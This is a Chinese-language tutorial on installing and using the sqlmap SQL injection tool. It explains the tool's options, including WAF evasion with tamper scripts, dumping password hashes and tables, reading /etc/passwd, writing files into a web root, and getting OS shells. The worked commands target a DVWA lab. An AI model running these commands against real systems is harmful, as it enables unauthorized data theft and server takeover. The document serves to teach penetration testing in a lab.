SQLmap安装和使用

MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB

1、基于布尔的盲注，即可以根据返回页面判断条件真假的注入。
2、基于时间的盲注，即不能根据页面返回内容判断任何信息，用条件语句查看时间延迟语句是否执行（即页
面返回时间是否增加）来判断。
3、基于报错注入，即页面会返回错误信息，或者把注入的语句的结果直接返回在页面中。
4、联合查询注入，可以使用union的情况下的注入。
5、堆查询注入，可以同时执行多条语句的执行时的注入。

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap
cd sqlmap
python sqlmap.py --update # 更新
python sqlmap.py -hh # 查看帮助信息

┌──(root㉿kali)-[~]
└─# sqlmap --version
1.6.11#stable

-u URL, --url=URL 目标URL (e.g."http://www.site.com/vuln.php?id=1")，使用-u或者--url
-d DIRECT 直接连接数据库的连接字符串
-l LOGFILE 从Burp或者WebScarab代理日志文件中分析目标
-x SITEMAPURL 从远程网站地图（sitemap.xml）文件来解析目标
-m BULKFILE 将目标地址保存在文件中，一行为一个URL地址进行批量检测。
-g GOOGLEDORK 从谷歌中加载结果目标URL（只获取前100个结果，需要挂代理）
-c CONFIGFILE 从配置ini文件中加载选项
-r REQUESTFILE 从文件加载HTTP请求，sqlmap可以从一个文本文件中获取HTTP请求，这样就可
以跳过设置一些其他参数（比如cookie，POST数据，等等），请求是HTTPS的时需要配合这个--forcessl参数来使用，或者可以在Host头后门加上:443

www.test1.com/vuln1.php?q=student
www.test2.com/vuln2.asp?id=1
www.test3.com/vuln3/id/1*

POST/students.php HTTP/1.1
Host:www.magedu.com
User-Agent:Mozilla/4.0

id=1

--method：指定请求方法
--data：把数据以POST方式提交
--param：当GET或POST的数据需要用其他字符分割测试参数的时候需要用到此参数
--cookie：设置cookie，提交请求的时候附带所设置的cookie
--load-cookies：从文件获取cookie
--user-agent：可以使用–user-anget参数来修改
--headers：可以通过–headers参数来增加额外的http头
--proxy：设置代理，可以避免本机地址被封禁
--delay：可以设定两个HTTP(S)请求间的延迟 防止发送过快导致被封ip
--random-agent：使用–random-agnet参数来随机的从./txt/user-agents.txt中获取。当–level参数设定为3或者3以上的时候，会尝试对User-Angent进行注入。
--referer：在请求目标的时候可以自己伪造请求包中的referer
–-level参数设定为3或者3以上的时候会尝试对referer注入。

python sqlmap.py -u "http://www.magedu.com/students.php" --data="id=1" -f --banner --dbs --users

python sqlmap.py -l burp_http.log --scope="(www)?\.target\.(com|net|org)"

--safe-url：提供一个安全不错误的连接，每隔一段时间都会去访问一下。
--safe-freq：提供一个安全不错误的连接，每次测试请求之后都会再访问一遍安全连接。

-o 开启所有优化开关

-p：设置想要测试的参数
--skip：不想要测试的参数可以通过 skip设置跳过
--dbms：指定数据库 节省sqlmap自己检测的时间
--os：指定数据库服务系统 节省sqlmap自己检测的时间
--tamper：使用sqlmap自带的tamper（脚本），或者自己写的tamper，来混淆payload，通常用来绕过waf和ips

 -p "id,user-anget" 

--skip="user-agent,referer"  

python sqlmap.py -u "http://magedu/param1/value1*/param2/value2/"

--level=LEVEL 执行测试的等级（1-5，默认为1）
--risk：（*慎用此参数有风险）， 共有四个风险等级（0-3），默认是1会测试大部分的测试语句，2会增加基于事件的测试语句，3会增加OR语句的SQL注入测试。

-a, --all 获取所有信息
-b, --banner 获取数据库管理系统的标识
--current-user 获取数据库管理系统当前用户
--current-db 获取数据库管理系统当前数据库
--hostname 获取数据库服务器的主机名称
--is-dba 检测DBMS当前用户是否DBA（数据库管理员）
--users 枚举数据库管理系统用户
--passwords 枚举数据库管理系统用户密码哈希
--privileges 枚举数据库管理系统用户的权限
--roles 枚举数据库管理系统用户的角色
--dbs 枚举数据库管理系统数据库
--tables 枚举的DBMS数据库中的表
--columns 枚举DBMS数据库表列
--schema 枚举数据库架构
--count 检索表的项目数
--dump 转储数据库表项，即下载
--dump-all 转储数据库所有表项
--search 搜索列（S），表（S）和/或数据库名称（S）
--comments 获取DBMS注释
-D DB 要进行枚举的指定数据库名
-T TBL DBMS数据库表枚举
-C COL DBMS数据库表列枚举
-X EXCLUDECOL DBMS数据库表不进行枚举
-U USER 用来进行枚举的数据库用户
--exclude-sysdbs 枚举表时排除系统数据库
--pivot-column=P.. Pivot columnname
--where=DUMPWHERE Use WHEREcondition while table dumping
--start=LIMITSTART 获取第一个查询输出数据位置
--stop=LIMITSTOP 获取最后查询的输出数据
--first=FIRSTCHAR 第一个查询输出字的字符获取
--last=LASTCHAR 最后查询的输出字字符获取
--sql-query=QUERY 要执行的SQL语句
--sql-shell 提示交互式SQL的shell
--sql-file=SQLFILE 要执行的SQL文件

python sqlmap.py -u "http://magedu/sqlmap/pgsql/students.php?id=1" --passwords -
v1

--common-tables 检查存在共同表
--common-columns 检查存在共同列
User-defined function injection（用户自定义函数注入）：
--udf-inject 注入用户自定义函数
--shared-lib=SHLIB 共享库的本地路径

--file-read=RFILE 从后端的数据库管理系统读取文件
--file-write=WFILE 上传文件到后端的数据库管理系统
--file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径

python sqlmap.py -u "http://127.0.0.1:8080/vulnerabilities/sqli/?
id=1&Submit=Submit#" --cookie="PHPSESSID=isgvp2rv4uts46jbkb9bouq6ir;
security=low" -p id --file-read "/etc/passwd"

python sqlmap.py -u "http://127.0.0.1:8080/vulnerabilities/sqli/?
id=1&Submit=Submit#" --cookie="PHPSESSID=isgvp2rv4uts46jbkb9bouq6ir;
security=low" -p id
python sqlmap.py -u "http://127.0.0.1:8080/vulnerabilities/sqli/?
id=1&Submit=Submit#" --cookie="PHPSESSID=isgvp2rv4uts46jbkb9bouq6ir;
security=low" -p id --file-write="/opt/test_code/user.txt" --filedest="/var/www/html/user.txt"

--os-cmd=OSCMD 执行操作系统命令
--os-shell 交互式的操作系统的shell
--os-pwn 获取一个OOB shell，meterpreter或VNC
--os-smbrelay 一键获取一个OOB shell，meterpreter或VNC
--os-bof 存储过程缓冲区溢出利用
--priv-esc 数据库进程用户权限提升
--msf-path=MSFPATH Metasploit Framework 本地的安装路径
--tmp-path=TMPPATH 远程临时文件目录的绝对路径

python sqlmap.py -u "http://magedu/sqlmap/firebird/students.php?id=1" --dump -T
users

-C后跟着用逗号分割的列名，将会在所有数据库表中搜索指定的列名。
-T后跟着用逗号分割的表名，将会在所有数据库中搜索指定的表名
-D后跟着用逗号分割的库名，将会在所有数据库中搜索指定的库名。

$python sqlmap.py -u "http://127.0.0.1:8080/vulnerabilities/sqli/?
id=1&Submit=Submit#" --sql-query "SELECT 'magedu'" -v1

python sqlmap.py -u "127.0.0.1:8080/vulnerabilities/sqli/?id=1&Submit=Submit#" -
-cookie="PHPSESSID=isgvp2rv4uts46jbkb9bouq6ir; security=low" -p id --os-cmd id

1、ASP
2、ASP.NET
3、JSP
4、PHP

python sqlmap.py -u "http://127.0.0.1:8080/vulnerabilities/sqli/?
id=1&Submit=Submit#" --batch --crawl=3

python sqlmap.py -u "http://127.0.0.1:8080/vulnerabilities/sqli/?
id=1&Submit=Submit#" --batch --crawl=3

1、判断可注入的参数
2、判断可以用那种SQL注入技术来注入
3、识别出哪种数据库
4、根据用户选择，读取哪些数据

0、只显示python错误以及严重的信息。
1、同时显示基本信息和警告信息。（默认）
2、同时显示debug信息。
3、同时显示注入的payload。
4、同时显示HTTP请求。
5、同时显示HTTP响应头。
6、同时显示HTTP响应页面。

# 判断注入点，因系统需要登录所以要加 cookie
python sqlmap.py -u "http://172.31.5.7/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=roh7b5kugi2pm1hbmnll8oohk4; security=low" -p id --batch

# 检测站点包含哪些数据库
python sqlmap.py -u "http://172.31.5.7/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=roh7b5kugi2pm1hbmnll8oohk4; security=low" -p id --dbs --batch

python sqlmap.py -u "http://172.31.5.7/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=roh7b5kugi2pm1hbmnll8oohk4; security=low" -D dvwa --tables --batch

python sqlmap.py -u "http://172.31.5.7/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=roh7b5kugi2pm1hbmnll8oohk4; security=low" -D dvwa -T users --columns

python sqlmap.py -u "http://172.31.5.7/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=roh7b5kugi2pm1hbmnll8oohk4; security=low" -D dvwa -T users -C last_name,password  --dump --batch